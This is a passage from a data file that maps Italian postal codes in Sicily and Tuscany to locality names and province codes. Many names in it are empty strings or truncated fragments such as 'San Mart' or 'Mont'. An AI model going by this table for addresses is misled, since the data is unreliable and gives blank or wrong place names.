"ME"], ["", "ME"], ["", "ME"], ], "98033": [["Cesaro'", "ME"]], "98034": [["", "ME"]], "98035": [["Naxos", "ME"], ["", "ME"], ["Pallio", "ME"]], "98036": [["Graniti", "ME"]], "98037": [["Letojanni", "ME"]], "98038": [["Rina", "ME"], ["Savoca", "ME"]], "98039": [ ["Chianchitta", "ME"], ["Mazzeo", "ME"], ["Taormina", "ME"], ["Trappitello", "ME"], ["Mazzaro'", "ME"], ], "98040": [ ["Fondachello", "ME"], ["'", "ME"], ["Torregrotta", "ME"], ["Condro'", "ME"], ["Roccavaldina", "ME"], ["Venetico", "ME"], ["", "ME"], ["", "ME"], ["Valdina", "ME"], ["Soccorso", "ME"], ["", "ME"], ["Meri'", "ME"], ], "98041": [["", "ME"], ["Pellegrino", "ME"], ["", "ME"]], "98042": [["Giammoro", "ME"], ["", "ME"]], "98043": [["Rometta", "ME"], ["", "ME"], ["Gimello", "ME"], ["Sant'Andrea", "ME"]], "98044": [ ["", "ME"], ["Archi", "ME"], ["Cattafi", "ME"], ["Olivarella", "ME"], ["Corriolo", "ME"], ], "98045": [["", "ME"], ["", "ME"]], "98046": [["", "ME"]], "98047": [["", "ME"], ["Saponara", "ME"], ["Cavaliere", "ME"], ["Scarcelli", "ME"]], "98048": [["Spadafora", "ME"], ["San Mart", "ME"], ["", "ME"]], "98049": [["", "ME"], ["Divieto", "ME"], ["Calvaruso", "ME"], ["Serro", "ME"]], "98050": [ ["Filicudi", "ME"], ["", "ME"], ["Panarea", "ME"], ["Alicudi", "ME"], ["Rubino", "ME"], ["", "ME"], ["Malfa", "ME"], ["Vulcano", "ME"], ["", "ME"], ["Vigliatore", "ME"], ["", "ME"], ["Lingua", "ME"], ["Ginostra", "ME"], ["Fantina", "ME"], ["", "ME"], ["", "ME"], ["", "ME"], ["", "ME"], ["Leni", "ME"], ["Stromboli", "ME"], ["Evangelisti", "ME"], ["", "ME"], ], "98051": [ ["", "ME"], ["", "ME"], ["La Gala", "ME"], ["", "ME"], ["Caldera'", "ME"], ["Sant'Antonio", "ME"], ["", "ME"], ["", "ME"], ["Cannistra'", 
"ME"], ["Gala", "ME"], ["Acquaficara", "ME"], ], "98053": [["Bafia", "ME"], ["Castroreale", "ME"], ["Protonotaro", "ME"]], "98054": [["Furnari", "ME"], ["Tonnarella", "ME"]], "98055": [ ["", "ME"], ["Lipari", "ME"], ["Acquacalda", "ME"], ["Canneto", "ME"], ["Pianoconte", "ME"], ["Quattropani", "ME"], ], "98056": [["", "ME"]], "98057": [["", "ME"], ["Milazzo", "ME"], ["San Pietro Di Milazzo", "ME"]], "98058": [["", "ME"], ["", "ME"]], "98059": [["", "ME"], ["Milici", "ME"]], "98060": [ ["Tripi", "ME"], ["Salina'", "ME"], ["Belvedere", "ME"], ["", "ME"], ["Montagnareale", "ME"], ["Piraino", "ME"], ["", "ME"], ["Falcone", "ME"], ["Basico'", "ME"], ["", "ME"], ["Gliaca", "ME"], ["Oliveri", "ME"], ["", "ME"], ["Campogrande", "ME"], ["", "ME"], ["Ucria", "ME"], ["", "ME"], ], "98061": [["Brolo", "ME"]], "98062": [["Ficarra", "ME"]], "98063": [["Magaro", "ME"], ["", "ME"], ["", "ME"]], "98064": [["Nasidi", "ME"], ["Librizzi", "ME"], ["", "ME"]], "98065": [["", "ME"], ["", "ME"], ["Braidi", "ME"]], "98066": [ ["Scala", "ME"], ["Mongiove", "ME"], ["Tindari", "ME"], ["Patti", "ME"], ["", "ME"], ["", "ME"], ["", "ME"], ], "98067": [["Raccuja", "ME"], ["", "ME"], ["Zappa", "ME"]], "98068": [["", "ME"], ["Fiumara", "ME"], ["Tesoriero", "ME"]], "98069": [["Sinagra", "ME"]], "98070": [ ["", "ME"], ["", "ME"], ["", "ME"], ["Mirto", "ME"], ["Reitano", "ME"], ["Torrenova", "ME"], ["Frazzano'", "ME"], ["", "ME"], ["", "ME"], ["Acquedolci", "ME"], ["", "ME"], ["", "ME"], ["Pettineo", "ME"], ["", "ME"], ["Castell'Umberto", "ME"], ["", "ME"], ["", "ME"], ["Sfaranda", "ME"], ["Longi", "ME"], ["Torremuzza", "ME"], ], "98071": [["", "ME"], ["Scafa", "ME"], ["", "ME"]], "98072": [["", "ME"], ["", "ME"], ["Caronia", "ME"]], "98073": [["Mistretta", "ME"]], "98074": [["Malo'", "ME"], ["Cresta", "ME"], ["Naso", "ME"]], "98075": [["", "ME"]], "98076": [["", "ME"], ["Vallebruca", "ME"], ["Torrecandele", "ME"]], "98077": [["", "ME"]], "98078": [ ["Moira", "ME"], ["Tortorici", "ME"], ["Sceti", "ME"], ["Grazia", "ME"], ["Ilombati", "ME"], ["", "ME"], ], "98079": [["", "ME"], ["Tusa", "ME"]], "98100": [["Messina", "ME"]], "98121": [["Messina", "ME"]], "98122": [["Messina", "ME"]], "98123": [["Messina", "ME"]], "98124": [["Messina", "ME"], ["Gazzi", "ME"]], "98125": [["Contesse", "ME"], ["Messina", "ME"]], "98126": [["Messina", "ME"], ["Santa Lucia Sopra Contesse", "ME"]], "98127": [["Zafferia", "ME"], ["Messina", "ME"]], "98128": [["Messina", "ME"], ["Tremestieri", "ME"]], "98129": [["Larderia", "ME"], ["Messina", "ME"]], "98131": [["Messina", "ME"], ["", "ME"]], "98132": [["", "ME"], ["", "ME"], ["Messina", "ME"]], "98133": [["Messina", "ME"], ["", "ME"]], "98134": [["Messina", "ME"], ["", "ME"]], "98135": [["Messina", "ME"], ["Santo ", "ME"], ["", "ME"]], "98136": [["", "ME"], ["Messina", "ME"]], "98137": [["", "ME"], ["Messina", "ME"]], "98138": [["Messina", "ME"], ["Pezzolo", "ME"]], "98139": [["San Placido Calonero'", "ME"], ["", "ME"], ["Briga", "ME"], ["Messina", "ME"]], "98141": [["Messina", "ME"], ["", "ME"]], "98142": [["Giampilieri", "ME"], ["San Filippo Inferiore", "ME"], ["Messina", "ME"]], "98143": [["Messina", "ME"], ["Altolia", "ME"], ["Molino", "ME"]], "98144": [["Messina", "ME"], ["o", "ME"]], "98145": [["Messina", "ME"], ["Bordonaro", "ME"], ["San Filippo", "ME"]], "98146": [["Cumia", "ME"], ["Santo", "ME"], ["Messina", "ME"]], "98147": [["Messina", "ME"], ["", "ME"]], "98148": [["Santo", "ME"], ["Messina", "ME"]], "98149": [["Messina", "ME"], ["Camaro", "ME"], ["", "ME"], ["Cataratti", "ME"]], "98151": 
[["Camaro", "ME"], ["Messina", "ME"]], "98152": [["Messina", "ME"], ["", "ME"], ["San Michele", "ME"]], "98153": [["Gesso", "ME"], ["Messina", "ME"]], "98154": [["Messina", "ME"], ["", "ME"], ["Salice", "ME"]], "98155": [["Castanea", "ME"], ["", "ME"], ["Messina", "ME"]], "98156": [["", "ME"], ["Messina", "ME"]], "98157": [["Messina", "ME"], ["", "ME"], ["", "ME"]], "98158": [["", "ME"], ["Messina", "ME"]], "98159": [["Messina", "ME"], ["", "ME"]], "98161": [["Messina", "ME"], ["Rodia", "ME"]], "98162": [["", "ME"], ["Messina", "ME"]], "98163": [["Messina", "ME"], ["Sparta'", "ME"]], "98164": [["", "ME"], ["Messina", "ME"], ["", "ME"]], "98165": [["Messina", "ME"], ["Ganzirri", "ME"]], "98166": [["Sant'Agata", "ME"], ["Messina", "ME"]], "98167": [["Messina", "ME"], ["Pace", "ME"]], "98168": [ ["", "ME"], ["Contemplazione", "ME"], ["Pace", "ME"], ["Villaggio Paradiso", "ME"], ["Messina", "ME"], ], "90010": [ ["", "PA"], ["Ustica", "PA"], ["Cerda", "PA"], ["Finale", "PA"], ["Gratteri", "PA"], ["Pollina", "PA"], ["Isnello", "PA"], ["", "PA"], ["", "PA"], ["Lascari", "PA"], ["Ficarazzi", "PA"], ["", "PA"], ["", "PA"], ["", "PA"], ["", "PA"], ], "90011": [["Aspra", "PA"], ["Bagheria", "PA"]], "90012": [["Sambuchi", "PA"], ["", "PA"], ["Caccamo", "PA"]], "90013": [["Castelbuono", "PA"]], "90014": [["Casteldaccia", "PA"]], "90015": [["Gibilmanna", "PA"], ["Sant'Ambrogio", "PA"], ["Cefalu'", "PA"]], "90016": [["Collesano", "PA"]], "90017": [["Sant'Elia", "PA"], ["Santa Flavia", "PA"], ["Porticello", "PA"]], "90018": [["Termini Imerese", "PA"], ["Danigarci", "PA"]], "90019": [["San Nicolo' L'Arena", "PA"], ["Trabia", "PA"]], "90020": [ ["Scillato", "PA"], ["Vicari", "PA"], ["Ventimiglia Di Sicilia", "PA"], ["Sciara", "PA"], ["Calcarelli", "PA"], ["Roccapalumba", "PA"], ["Baucina", "PA"], ["Blufi", "PA"], ["Alimena", "PA"], ["", "PA"], ["Nociazzi Inferiore", "PA"], ["Aliminusa", "PA"], ["Regalgioffoli", "PA"], ["", "PA"], ["", "PA"], ["Bompietro", "PA"], ["Nociazzi", "PA"], ["Locati", "PA"], ], "90021": [["Alia", "PA"]], "90022": [["Caltavuturo", "PA"]], "90023": [["Ciminna", "PA"]], "90024": [["Gangi", "PA"]], "90025": [["", "PA"]], "90026": [ ["Pianello", "PA"], ["Pianello Di Petralia Sottana", "PA"], ["Raffo", "PA"], ["Petralia Soprana", "PA"], ["Fasano'", "PA"], ], "90027": [["Petralia Sottana", "PA"]], "90028": [["Polizzi Generosa", "PA"]], "90029": [["Valledolmo", "PA"]], "90030": [ ["", "PA"], ["Godrano", "PA"], ["Blandino", "PA"], ["", "PA"], ["Campofiorito", "PA"], ["Giuliana", "PA"], ["", "PA"], ["Contessa Entellina", "PA"], ["Castronuovo Di Sicilia", "PA"], ["Mezzojuso", "PA"], ["Villafrati", "PA"], ["", "PA"], ["Altofonte", "PA"], ["Bolognetta", "PA"], ["", "PA"], ], "90031": [["", "PA"]], "90032": [["Bisacquino", "PA"]], "90033": [["", "PA"], ["", "PA"]], "90034": [["Corleone", "PA"], ["Ficuzza", "PA"]], "90035": [["Marineo", "PA"]], "90036": [["", "PA"], ["Misilmeri", "PA"]], "90037": [["", "PA"]], "90038": [["Filaga", "PA"], ["Prizzi", "PA"]], "90039": [["Villabate", "PA"]], "90040": [ ["Montelepre", "PA"], ["Giardinello", "PA"], ["Trappeto", "PA"], ["Roccamena", "PA"], ["San Cipirello", "PA"], ["Grisi'", "PA"], ["", "PA"], ["Capaci", "PA"], ["Torretta", "PA"], ["Cortiglia", "PA"], ], "90041": [["Balestrate", "PA"], ["Foce", "PA"]], "90042": [["Borgetto", "PA"]], "90043": [["Camporeale", "PA"]], "90044": [["", "PA"], ["Carini", "PA"]], "90045": [["Cinisi", "PA"], ["Punta Raisi Aeroporto", "PA"]], "90046": [ ["", "PA"], ["", "PA"], ["Pioppo", "PA"], ["San Martino Delle Scale", "PA"], 
["Malpasso", "PA"], ["Monreale", "PA"], ], "90047": [["Partinico", "PA"]], "90048": [["", "PA"]], "90049": [["Terrasini", "PA"], ["Citta' Del Mare", "PA"]], "90100": [["Palermo", "PA"]], "90121": [ ["Palermo", "PA"], ["Boccadifalco", "PA"], ["In Via Messina Marine", "PA"], ["In Via Ammiraglio Cristodulo", "PA"], ["Brancaccio Ciaculli", "PA"], ["Acqua ", "PA"], ], "90122": [["", "PA"], ["Palermo", "PA"]], "90123": [["Palermo", "PA"], ["Settecannoli", "PA"]], "90124": [ ["In Via Chiavelli", "PA"], ["Brancaccio Ciaculli", "PA"], ["In Via Brancaccio", "PA"], ["In Via Santa Maria '", "PA"], ["Palermo", "PA"], ], "90125": [["Palermo", "PA"], ["In Via Aloi", "PA"]], "90126": [["", "PA"], ["Palermo", "PA"]], "90127": [["Palermo", "PA"]], "90128": [["Palermo", "PA"]], "90129": [["Palermo", "PA"]], "90131": [["Palermo", "PA"], ["R", "PA"]], "90132": [["Palermo", "PA"]], "90133": [["Palermo", "PA"], ["Tribunali Castellammare", "PA"]], "90134": [["Zisa", "PA"], ["In Via Gioiamia", "PA"], ["Palermo", "PA"]], "90135": [["Palermo", "PA"], ["Zisa", "PA"]], "90136": [["Palermo", "PA"]], "90137": [["Palermo", "PA"]], "90138": [["Palermo", "PA"], ["Zisa", "PA"]], "90139": [["Palermo", "PA"]], "90141": [["Palermo", "PA"]], "90142": [["Palermo", "PA"], ["Montepellegrino", "PA"], ["", "PA"]], "90143": [["Palermo", "PA"]], "90144": [["Palermo", "PA"]], "90145": [["Palermo", "PA"]], "90146": [ ["Palermo", "PA"], ["In Via San Nicola", "PA"], ["Pallavicino", "PA"], ["Cruillas", "PA"], ["", "PA"], ["", "PA"], ], "90147": [["", "PA"], ["Palermo", "PA"]], "90148": [["Palermo", "PA"], ["Sferracavallo", "PA"], ["Villagrazia", "PA"], ["", "PA"]], "90149": [["Palermo", "PA"]], "90151": [["Palermo", "PA"], ["", "PA"], ["Mondello", "PA"]], "97010": [ ["", "RG"], ["Bellocozzo", "RG"], ["", "RG"], ["", "RG"], ["Roccazzo", "RG"], ["Giarratana", "RG"], ], "97011": [["Acate", "RG"]], "97012": [["", "RG"]], "97013": [["Pedalino", "RG"], ["Comiso", "RG"]], "97014": [["Ispica", "RG"]], "97015": [ ["", "RG"], ["Frigintini", "RG"], ["", "RG"], ["", "RG"], ["Modica", "RG"], ], "97016": [["Pozzallo", "RG"]], "97017": [["Santa Croce Camerina", "RG"], ["Donnafugata", "RG"]], "97018": [["Donnalucata", "RG"], ["Jungi", "RG"], ["", "RG"], ["Scicli", "RG"], ["Sampieri", "RG"]], "97019": [["Scoglitti", "RG"], ["Vittoria", "RG"]], "97100": [["Ragusa", "RG"], ["", "RG"]], "96010": [ ["", "SR"], ["Melilli", "SR"], ["Buccheri", "SR"], ["Villasmundo", "SR"], ["Sortino", "SR"], ["Ferla", "SR"], ["", "SR"], ["'", "SR"], ["", "SR"], ["Cassaro", "SR"], ["Buscemi", "SR"], ["Rizzolo", "SR"], ["Solarino", "SR"], ["", "SR"], ["", "SR"], ], "96011": [["Augusta", "SR"], ["Brucoli", "SR"]], "96012": [["Avola", "SR"]], "96013": [["", "SR"], ["Carlentini", "SR"], ["Pedagaggi", "SR"]], "96014": [["Floridia", "SR"]], "96015": [["Francofonte", "SR"]], "96016": [["Lentini", "SR"]], "96017": [ ["", "SR"], ["", "SR"], ["San Paolo", "SR"], ["", "SR"], ["Noto", "SR"], ["Santa Lucia Di Noto", "SR"], ["", "SR"], ["Rigolizia", "SR"], ["Castelluccio", "SR"], ], "96018": [["Marzamemi", "SR"], ["Pachino", "SR"]], "96019": [["Rosolini", "SR"]], "96100": [ ["Siracusa", "SR"], ["Carrozziere", "SR"], ["", "SR"], ["Belvedere", "SR"], ["Cassibile", "SR"], ], "91010": [ ["Castelluzzo", "TP"], ["Macari", "TP"], ["Vita", "TP"], ["Marettimo", "TP"], ["", "TP"], ], "91011": [["Alcamo", "TP"]], "91012": [["Bruca", "TP"], ["Battaglia", "TP"], ["", "TP"]], "91013": [["Sasi", "TP"], ["", "TP"], ["Calatafimi", "TP"]], "91014": [ ["Scopello", "TP"], ["", "TP"], ["", "TP"], ["", "TP"], ], 
"91015": [["", "TP"], ["Purgatorio", "TP"], ["Custonaci", "TP"]], "91016": [ ["Napola", "TP"], ["Ballata", "TP"], ["Pizzolungo", "TP"], ["", "TP"], ["", "TP"], ["Rigaletta", "TP"], ["Erice", "TP"], ], "91017": [ ["Kamma", "TP"], ["", "TP"], ["Scauri", "TP"], ["", "TP"], ["Pantelleria", "TP"], ], "91018": [["Ulmi", "TP"], ["Filci", "TP"], ["", "TP"], ["Salemi", "TP"], ["Gorgazzo", "TP"]], "91019": [ ["Valderice", "TP"], ["", "TP"], ["Chiesanuova", "TP"], ["Crocevie", "TP"], [" Bonagia", "TP"], ["Bonagia", "TP"], ["Crocci", "TP"], ["Fico", "TP"], ], "91020": [ ["Poggioreale", "TP"], ["Salaparuta", "TP"], ["Granitola", "TP"], ["", "TP"], ["Petrosino", "TP"], ], "91021": [["", "TP"], ["", "TP"], ["", "TP"]], "91022": [["Castelvetrano", "TP"], ["", "TP"], ["Marinella", "TP"], ["Triscina", "TP"]], "91023": [["Favignana", "TP"], ["Levanzo", "TP"]], "91024": [["Gibellina", "TP"], ["", "TP"]], "91025": [ ["Spagnola", "TP"], ["Marsala", "TP"], ["Ragattisi", "TP"], ["Matarocco", "TP"], ["Ciavolotto", "TP"], ["Bufalata", "TP"], ["Tabaccaro", "TP"], ["", "TP"], ["", "TP"], ["", "TP"], ["Paolini", "TP"], ["Ciavolo", "TP"], ], "91026": [["", "TP"], ["", "TP"]], "91027": [["Paceco", "TP"], ["Dattilo", "TP"], ["Nubia", "TP"]], "91028": [["Partanna", "TP"]], "91029": [["", "TP"]], "91100": [ ["Xitta", "TP"], ["", "TP"], ["Locogrande", "TP"], ["", "TP"], ["", "TP"], ["", "TP"], ["Marausa", "TP"], ["Ummari", "TP"], ["Fulgatore", "TP"], ["", "TP"], ["", "TP"], ["Trapani", "TP"], ["Guarrato", "TP"], ["Salinagrande", "TP"], ["Rilievo", "TP"], ], "52010": [ ["", "AR"], ["", "AR"], ["Biforco", "AR"], ["Subbiano", "AR"], ["Corsalone", "AR"], ["Ortignano", "AR"], ["", "AR"], ["", "AR"], ["Montemignaio", "AR"], ["Faltona", "AR"], ["Capolona", "AR"], ["Chitignano", "AR"], ["Talla", "AR"], ["", "AR"], ["Raggiolo", "AR"], ["", "AR"], ], "52011": [ ["Bibbiena", "AR"], ["Soci", "AR"], ["Partina", "AR"], ["Banzena", "AR"], ["Bibbiena Stazione", "AR"], ["Serravalle", "AR"], ], "52014": [ ["", "AR"], ["Avena", "AR"], ["Quota", "AR"], ["Camaldoli", "AR"], ["Poppi", "AR"], ["Porrena", "AR"], ["", "AR"], ["Moggiona", "AR"], ], "52015": [["Pratovecchio", "AR"], ["Pratovecchio Stia", "AR"]], "52016": [["", "AR"], ["Rassina", "AR"], ["Salutio", "AR"], ["", "AR"]], "52017": [["Papiano", "AR"], ["Stia", "AR"]], "52018": [["", "AR"], ["Strada", "AR"], ["'", "AR"]], "52020": [ ["", "AR"], ["Laterina", "AR"], ["Ponticino", "AR"], ["", "AR"], ["Montalto", "AR"], ["", "AR"], ["", "AR"], ["Cavi", "AR"], ["Casalone", "AR"], ], "52021": [ ["Torre", "AR"], ["", "AR"], ["Capannole", "AR"], ["Ambra", "AR"], ["Bucine", "AR"], ["Pietraviva", "AR"], ], "52022": [ ["Meleto", "AR"], ["Cavriglia", "AR"], ["", "AR"], ["Neri", "AR"], ["Vacchereccia", "AR"], ["Santa Barbara", "AR"], ["Monastero", "AR"], ["", "AR"], ["Montegonzi", "AR"], ], "52024": [["", "AR"], ["", "AR"]], "52025": [["Levane", "AR"], ["Montevarchi", "AR"], ["Moncioni", "AR"], ["", "AR"]], "52026": [["", "AR"], ["", "AR"], ["Vaggio", "AR"], ["Faella", "AR"]], "52027": [["", "AR"]], "52028": [ ["Penna", "AR"], ["Madrigale", "AR"], ["", "AR"], ["Ville", "AR"], ["Campogialli", "AR"], ["Malva", "AR"], ], "52029": [["", "AR"]], "52031": [["", "AR"], ["Anghiari", "AR"]], "52032": [["", "AR"], ["", "AR"], ["Fresciano", "AR"]], "52033": [["", "AR"]], "52035": [["Le Ville", "AR"], ["Monterchi", "AR"]], "52036": [["Madonnuccia", "AR"], ["", "AR"]], "52037": [["Gricignano", "AR"], ["", "AR"], ["Sansepolcro", "AR"]], "52038": [["Colcellalto", "AR"], ["Sestino", "AR"], ["Monterone", "AR"]], 
"52041": [ ["", "AR"], ["Viciomaggio", "AR"], ["Ciggiano", "AR"], ["", "AR"], ["Tegoleto", "AR"], ["", "AR"], ], "52043": [["", "AR"], ["Montecchio", "AR"], ["Manciano", "AR"]], "52044": [ ["", "AR"], ["Cortona", "AR"], ["Mercatale", "AR"], ["Santa Caterina", "AR"], ["Santa Caterina Di Cortona", "AR"], ["Fratta", "AR"], ["Centoia", "AR"], ["", "AR"], ["Capezzine", "AR"], ["Montanare", "AR"], ["", "AR"], ["Camucia", "AR"], ["", "AR"], ["Terontola", "AR"], ], "52045": [["", "AR"], ["", "AR"]], "52046": [["Lucignano", "AR"]], "52047": [["Marciano", "AR"], ["Cesa", "AR"], ["", "AR"]], "52048": [ ["Montagnano", "AR"], ["", "AR"], ["", "AR"], ["Palazzuolo", "AR"], ["Alberoro", "AR"], ], "52100": [ ["Patrignone", "AR"], ["Chiassa", "AR"], ["", "AR"], ["", "AR"], ["", "AR"], ["", "AR"], ["Olmo", "AR"], ["", "AR"], ["Indicatore", "AR"], ["Battifolle", "AR"], ["", "AR"], ["Frassineto", "AR"], ["Rigutino", "AR"], ["Pratantico", "AR"], ["Quarata", "AR"], ["Ruscello", "AR"], ["Poggiola", "AR"], ["Arezzo", "AR"], ["", "AR"], ["Ceciliano", "AR"], ["Antria", "AR"], ["Staggiano", "AR"], ["Puglia", "AR"], ["Tregozzano", "AR"], ], "50010": [["Trespiano", "FI"]], "50012": [ ["Vallina", "FI"], ["", "FI"], ["Grassina Pont", "FI"], ["Osteria Nuova", "FI"], ["Candeli", "FI"], ["Grassina", "FI"], ["Antella", "FI"], ["Rimaggio", "FI"], ], "50013": [ ["San Piero A Ponti", "FI"], ["Il Rosi", "FI"], ["San Donnino Di Campi", "FI"], ["Capalle", "FI"], ["Sant'Angelo", "FI"], ["San Donnino", "FI"], ["", "FI"], ["", "FI"], ], "50014": [["Caldine", "FI"], ["", "FI"], ["Fiesole", "FI"], ["", "FI"]], "50018": [ ["", "FI"], ["Casellina", "FI"], ["", "FI"], ["Scandicci", "FI"], ["", "FI"], ["Le Bagnese San Giusto", "FI"], ], "50019": [ ["Querceto", "FI"], ["Quinto", "FI"], ["Osmannoro", "FI"], ["", "FI"], ["Colonnata", "FI"], ["", "FI"], ], "50020": [["", "FI"]], "50021": [["", "FI"], ["Marcialla", "FI"]], "50022": [ ["Lamole", "FI"], ["Panzano", "FI"], ["San Polo In Chianti", "FI"], ["Lucolena", "FI"], ["Greve In Chianti", "FI"], ], "50023": [ ["Tavarnuzze", "FI"], ["", "FI"], ["Impruneta", "FI"], ["Pozzolatico", "FI"], ["Bottai", "FI"], ], "50025": [ ["San Quirico In Collina", "FI"], ["Lucardo", "FI"], ["Montespertoli", "FI"], ["Martignana", "FI"], ["Baccaiano", "FI"], ["Montagnana Val Di Pesa", "FI"], ], "50026": [ ["San Casciano In Val Di Pesa", "FI"], ["", "FI"], ["Cerbaia", "FI"], ["Mercatale", "FI"], ["Romola", "FI"], ["Montefiridolfi", "FI"], ["Spedaletto", "FI"], ], "50027": [["Chiocchio", "FI"], ["Strada In Chianti", "FI"], ["Passo Dei Pecorai", "FI"]], "50028": [ ["San Donato In Poggio", "FI"], ["Barberino Val D'Elsa", "FI"], ["Sambuca Val Di Pesa", "FI"], ["Tavarnelle Val Di Pesa", "FI"], ["Sambuca", "FI"], ], "50031": [ ["Cavallina", "FI"], ["Cafaggiolo", "FI"], ["Galliano", "FI"], ["", "FI"], ["", "FI"], ["Montecarelli", "FI"], ], "50032": [ ["", "FI"], ["", "FI"], ["Ronta", "FI"], ["Panicaglia", "FI"], ["Polcanto", "FI"], ], "50033": [ ["Bruscoli", "FI"], ["Rifredo", "FI"], ["Filigare", "FI"], ["Traversa", "FI"], ["Pietramala", "FI"], ["Coniale", "FI"], ["Cornacchiaia", "FI"], ["Firenzuola", "FI"], ["Covigliaio", "FI"], ["Piancaldoli", "FI"], ], "50034": [["Crespino Del Lamone", "FI"], ["Casaglia", "FI"], ["Lutirano", "FI"], ["Marradi", "FI"]], "50035": [["Misileo", "FI"], ["Palazzuolo Sul Senio", "FI"]], "50036": [["Bivigliano", "FI"], ["Pratolino", "FI"], ["Vaglia", "FI"], ["Fontebuona", "FI"]], "50037": [["San Piero A Sieve", "FI"]], "50038": [ ["Sant'Agata Mugello", "FI"], ["Scarperia", "FI"], ["Sant'Agata", 
"FI"], ["Scarperia E San Piero", "FI"], ], "50039": [["Cistio", "FI"], ["Rupecanina", "FI"], ["Villore", "FI"], ["Gattaia", "FI"], ["Vicchio", "FI"]], "50041": [ ["Calenzano", "FI"], ["Carraia", "FI"], ["Le Croci", "FI"], ["", "FI"], ["Settimello", "FI"], ], "50050": [ ["Capraia", "FI"], ["Stabbia", "FI"], ["Montaione", "FI"], ["", "FI"], ["Il Castagno Val D'Elsa", "FI"], ["Varna", "FI"], ["Limite Sull'Arno", "FI"], ["Il Castagno", "FI"], ["Ponte Di Masino", "FI"], ["Bassa", "FI"], ["", "FI"], ["", "FI"], ["", "FI"], ["Lazzeretto", "FI"], ["", "FI"], ["", "FI"], ["Gavena", "FI"], ], "50051": [ ["Dogana", "FI"], ["Petrazzi", "FI"], ["", "FI"], ["Cambiano", "FI"], ["Castelfiorentino", "FI"], ["Granaiolo", "FI"], ], "50052": [["Fiano", "FI"], ["Certaldo", "FI"]], "50053": [ ["Empoli", "FI"], ["Brusciana", "FI"], ["Fontanella", "FI"], ["Sant'Andrea", "FI"], ["", "FI"], ["", "FI"], ["Monterappoli", "FI"], ["", "FI"], ["Marcignana", "FI"], ], "50054": [ ["", "FI"], ["Galleno", "FI"], ["Torre", "FI"], ["", "FI"], ["Massarella", "FI"], ["Le Botteghe", "FI"], ["Fucecchio", "FI"], ["", "FI"], ["Querce", "FI"], ], "50055": [ ["", "FI"], ["Lastra A Signa", "FI"], ["Malmantile", "FI"], ["", "FI"], ["Brucianesi", "FI"], ["", "FI"], ], "50056": [ ["Ambrogiana", "FI"], ["Sammontana", "FI"], ["Samminiatello", "FI"], ["Fibbiana", "FI"], ["", "FI"], ], "50058": [["Signa", "FI"], ["San Mauro", "FI"], ["San Mauro A Signa", "FI"]], "50059": [ ["Orbignano", "FI"], ["Sant'Amato", "FI"], ["Vitolini", "FI"], ["San Pantaleo", "FI"], ["Spicchio", "FI"], ["Sovigliana", "FI"], ["Vinci", "FI"], ], "50060": [ ["Consuma", "FI"], ["Londa", "FI"], ["Borselli", "FI"], ["San Godenzo", "FI"], ["Pelago", "FI"], ["Diacceto", "FI"], ], "50061": [["Compiobbi", "FI"]], "50062": [["Sandetole", "FI"], ["Dicomano", "FI"]], "50063": [["Figline E Inc", "FI"], ["Figline Valdarno", "FI"]], "50064": [["Incisa In Val D'Arno", "FI"], ["Loppiano", "FI"]], "50065": [ ["Pontassieve", "FI"], ["Montebonello", "FI"], ["", "FI"], ["Santa Brigida", "FI"], ["Sieci", "FI"], ], "50066": [ ["Tosi", "FI"], ["Cancelli", "FI"], ["Cascia", "FI"], ["Sant'Ellero", "FI"], ["Pietrapiana", "FI"], ["Donnini", "FI"], ["Reggello", "FI"], ["Saltino", "FI"], ["Matassino", "FI"], ["Vaggio", "FI"], ["Leccio", "FI"], ["", "FI"], ["Vallombrosa", "FI"], ["San ", "FI"], ], "50067": [["Troghi", "FI"], ["San Donato In Collina", "FI"], ["", "FI"], ["Rosano", "FI"]], "50068": [["Pomino", "FI"], ["Rufina", "FI"], ["Contea", "FI"]], "50100": [["Firenze", "FI"]], "50121": [["Firenze", "FI"]], "50122": [["Firenze", "FI"]], "50123": [["Firenze", "FI"]], "50124": [["Firenze", "FI"], ["Galluzzo", "FI"]], "50125": [["Arcetri", "FI"], ["P", "FI"], ["San Felice A Ema", "FI"], ["Firenze", "FI"]], "50126": [ ["Firenze", "FI"], ["Ponte A Ema", "FI"], ["Sorgane", "FI"], ["Bandino", "FI"], ["Pieve A Ripoli", "FI"], ["Badia A Ripoli", "FI"], ], "50127": [["Firenze", "FI"], ["Novoli", "FI"]], "50129": [["Firenze", "FI"]], "50131": [["Firenze", "FI"]], "50132": [["Firenze", "FI"]], "50133": [["Firenze", "FI"]], "50134": [["Firenze", "FI"], ["Careggi", "FI"]], "50135": [["Montalbano", "FI"], ["Settignano", "FI"], ["Coverciano", "FI"], ["Firenze", "FI"]], "50136": [["Firenze", "FI"], ["Rovezzano", "FI"], ["Varlungo", "FI"]], "50137": [["Firenze", "FI"]], "50139": [["Firenze", "FI"]], "50141": [["Firenze", "FI"], ["Castello", "FI"], ["Rifredi", "FI"]], "50142": [["Mantignano", "FI"], ["Isolotto", "FI"], ["Firenze", "FI"]], "50143": [["Firenze", "FI"]], "50144": [["Firenze", "FI"]], "50145": 
[["Firenze", "FI"], ["Brozzi", "FI"], ["Peretola", "FI"]], "58010": [ ["San Quirico", "GR"], ["Montebuono", "GR"], ["San Valentino", "GR"], ["Sorano", "GR"], ["Pratolungo", "GR"], ["Elmo", "GR"], ["Castell'Ottieri", "GR"], ["Montorio", "GR"], ["Sovana", "GR"], ["Albinia", "GR"], ["Montevitozzo", "GR"], ["", "GR"], ], "58011": [["", "GR"], ["", "GR"], ["Chiarone", "GR"], ["Capalbio", "GR"]], "58012": [ ["", "GR"], ["", "GR"], ["", "GR"], ["Campese", "GR"], ["", "GR"], ], "58014": [ ["", "GR"], ["", "GR"], ["", "GR"], ["Marsiliana", "GR"], ["San Martino Sul Fiora", "GR"], ["Saturnia", "GR"], ["Manciano", "GR"], ["Montemerano", "GR"], ], "58015": [ ["Polverosa", "GR"], ["Fonteblanda", "GR"], ["Orbetello", "GR"], ["Santa Liberata", "GR"], ["Orbetello Scalo", "GR"], ["Talamone", "GR"], ["Orbetello Stazione", "GR"], ], "58017": [["Il Casone", "GR"], ["Casone", "GR"], ["Pitigliano", "GR"]], "58018": [["Porto Ercole", "GR"]], "58019": [["", "GR"], ["Mont", "GR"], ["Giannutri", "GR"]], "58020": [["Puntone", "GR"], ["Scarlino Stazione", "GR"], ["Scarlino Scalo", "GR"], ["Scarlino", "GR"]], "58022": [["", "GR"], ["Follonica", "GR"]], "58023": [ ["", "GR"], ["Miniera", "GR"], ["", "GR"], ["", "GR"], ["Potassa", "GR"], ["Caldana", "GR"], ["Ravi", "GR"], ["Giuncarico", "GR"], ["Grilli", "GR"], ["Gavorrano", "GR"], ["Boschetto", "GR"], 